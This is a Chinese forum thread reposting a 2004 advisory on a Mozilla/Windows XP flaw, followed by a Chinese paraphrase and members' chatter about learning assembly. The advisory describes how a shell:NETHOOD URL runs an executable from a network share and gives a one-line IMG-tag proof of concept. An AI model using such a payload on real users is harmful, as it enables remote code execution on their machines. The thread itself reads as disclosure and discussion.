远程运行可执行程序的shell代码

[START] Advisory TESTED ------ MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616") running on winxp.en.home.sp1a.up2date.20040709 PROCESS ------- Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p". This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD" At last, make MOZILLA request the following URL: shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe A file named "fileid.exe" in the "shared" folder will be executed. REFERENCE --------- MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url: http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html greetingz fly to perrymonj. WINDOWS support "shell:NETHOOD": http://does-not-exist.org/mail-archives/bugtraq/msg02171.html thanks to malware for his additional research , and Cheng Peng Su for his original discovery. ######################### [START] PROOF OF CONCEPT ####################### [IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"] 来源:http://666w.com/art/568.htm

偶没学过汇编,鹦鹉太强了,搞的我都想拜你为师了.............

在X-6487ohu4s6x0p服务器上访问名为shared的共享文件夹，创造一条名为shared on X-6487ohu4s6x0p捷径在shell:NETHOOD文件夹，最后，向shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe 发出 MOZILLA 请求，shared文件夹的fileid.exe文件将被执行，当在http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html 操纵了有效的shell协议，MOZILLA 将会执行一个文件，windows支持shell:NETHOOD

好

支持，希望鹦鹉详细解释啊，不懂哦。今天下午看了半天的汇编，头都大了，哎，以前没学好啊，要是老师早告诉我汇编可以当黑客工具用的话，我想我也可以象鹦鹉那样了。从今天开始，向鹦鹉学习~~~

好的
今天要下了
明天来解释：）
我觉得我们应该多看些底层编程的文章
你觉得呢？
如果觉得是
以后偶多发些这方面的：）

冒看懂,鹦鹉能不能解释下啊,,,,